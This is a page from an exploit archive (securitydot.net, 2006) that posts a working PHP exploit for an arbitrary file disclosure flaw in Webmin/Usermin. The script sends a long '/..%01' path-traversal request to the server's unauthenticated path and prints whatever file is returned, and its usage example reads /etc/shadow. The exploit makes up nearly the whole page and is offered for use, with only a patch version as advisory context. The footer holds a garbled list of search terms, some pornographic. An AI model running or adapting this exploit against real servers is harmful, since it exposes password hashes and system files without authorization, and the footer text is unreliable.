about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Webmin / Usermin Arbitrary File Disclosure Vulnerability




2006-07-09 Webmin / Usermin Arbitrary File Disclosure Vulnerability
Rated as : Critical Risk
<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date : 	2006-06-30
Patch : update to version 1.290
Advisory :
http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/

$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != ""
&& $file != "") {
	

$z = "/..%01";
for ($i=0;$i<60;$i++) {
	$z.="/..%01";
}

$target =
$http."://".$host.":".$port."/unauthenticated".$z."/".$file."";

echo "Attacking ".$host."\n";
echo "---------------------------------\n";

// INITIALIZING CURL SESSION TO THE TARGET

$ch = curl_init();

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);

$content = curl_exec($ch);
curl_close ($ch);

// CLOSING CURL

// ECHOING THE CONTENT OF THE $FILE
echo $content;

echo "---------------------------------\n";
echo "Coded by joffer , http://securitydot.net\n";

} else {
	// IF INPUT IS NOT CORRECT DISPLAY THE README
	echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
	echo "Example : php webmin.php localhost 10000 http
/etc/shadow\n";
	echo "Coded by joffer , http://securitydot.net\n";
}

?>
securitydot.net - 2006-07-09

Advertising

Copyright 2007, SecurityDot
Sat, 04 Jul 2009 10:10:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
lib/armyga WWW.SEXOCE senas de s www.97se.c mambo Remo Apach 1.3. Barbi3 news for c 200 /compo all sex vi mambo Remo ja_ WEED mambo Remo www,com89 phpnuke Pl Www.gogle. gexo www.zgrczp 200 /compo Bone thugs news for c search/exp mambo Remo www.india sql and in www. anima PHP Nuke E Oralsexmov XoopsGalle mambo Remo www.zt4f99 sex arab 3 mariya r...s gall digi mambo Remo vip.qsnook world sex mkp news for c Www.South 200 /compo Indins 200 /compo 168188.com mambo Remo 200 /compo news for C www.zgrczp